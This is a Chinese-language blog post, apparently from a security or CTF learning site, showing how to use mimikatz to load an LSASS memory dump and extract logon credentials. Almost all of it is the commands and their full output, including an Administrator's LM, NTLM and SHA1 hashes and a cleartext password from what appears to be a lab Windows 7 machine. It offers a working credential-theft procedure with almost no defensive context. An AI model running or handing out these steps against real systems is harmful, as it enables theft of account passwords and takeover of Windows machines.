利用mimikatz从lsass.dmp中提取管理员密码

Luz5年前 (2019-12-05)DayDayUp6131

提升权限

mimikatz # privilege::debug
Privilege '20' OK

挂载dmp文件

mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP : 'lsass.dmp'

提取密码

mimikatz # sekurlsa::logonPasswords full
Opening : 'lsass.dmp' file for minidump...
Authentication Id : 0 ; 347784 (00000000:00054e88)
Session           : Interactive from 1
User Name         : Administrator
Domain            : WIN7
Logon Server      : WIN7
Logon Time        : 2019/11/14 9:38:33
SID               : S-1-5-21-1539156736-1959120456-2224594862-500
        msv :
         [00000003] Primary
         * Username : Administrator
         * Domain   : WIN7
         * LM       : c4d0515fb12046a475113b7737dc0019
         * NTLM     : aafdad330f5a9f4fbf562ed3d25f97de
         * SHA1     : 8b9a7ca86970d1392b6fa0b94b8694c2b919469f
        tspkg :
         * Username : Administrator
         * Domain   : WIN7
         * Password : W3lc0meToD0g3
        wdigest :
         * Username : Administrator
         * Domain   : WIN7
         * Password : W3lc0meToD0g3
        kerberos :
         * Username : Administrator
         * Domain   : WIN7
         * Password : W3lc0meToD0g3
        ssp :
        credman :
Authentication Id : 0 ; 997 (00000000:000003e5)
Session           : Service from 0
User Name         : LOCAL SERVICE
Domain            : NT AUTHORITY
Logon Server      : (null)
Logon Time        : 2019/11/14 9:35:06
SID               : S-1-5-19
        msv :
        tspkg :
        wdigest :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        kerberos :
         * Username : (null)
         * Domain   : (null)
         * Password : (null)
        ssp :
        credman :
Authentication Id : 0 ; 996 (00000000:000003e4)
Session           : Service from 0
User Name         : WIN7$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2019/11/14 9:35:06
SID               : S-1-5-20
        msv :
        tspkg :
        wdigest :
         * Username : WIN7$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : win7$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :
Authentication Id : 0 ; 48847 (00000000:0000becf)
Session           : UndefinedLogonType from 0
User Name         : (null)
Domain            : (null)
Logon Server      : (null)
Logon Time        : 2019/11/14 9:35:04
SID               :
        msv :
        tspkg :
        wdigest :
        kerberos :
        ssp :
        credman :
Authentication Id : 0 ; 999 (00000000:000003e7)
Session           : UndefinedLogonType from 0
User Name         : WIN7$
Domain            : WORKGROUP
Logon Server      : (null)
Logon Time        : 2019/11/14 9:35:04
SID               : S-1-5-18
        msv :
        tspkg :
        wdigest :
         * Username : WIN7$
         * Domain   : WORKGROUP
         * Password : (null)
        kerberos :
         * Username : win7$
         * Domain   : WORKGROUP
         * Password : (null)
        ssp :
        credman :

返回列表

上一篇：图片的F5隐写 F5-steganography

下一篇：敲击码

利用mimikatz从lsass.dmp中提取管理员密码

发表评论

CHNEYE

Powered By Z-BlogPHP. Theme by TOYEAN.

利用mimikatz从lsass.dmp中提取管理员密码

发表评论取消回复

CHNEYE

Powered By Z-BlogPHP. Theme by TOYEAN.

发表评论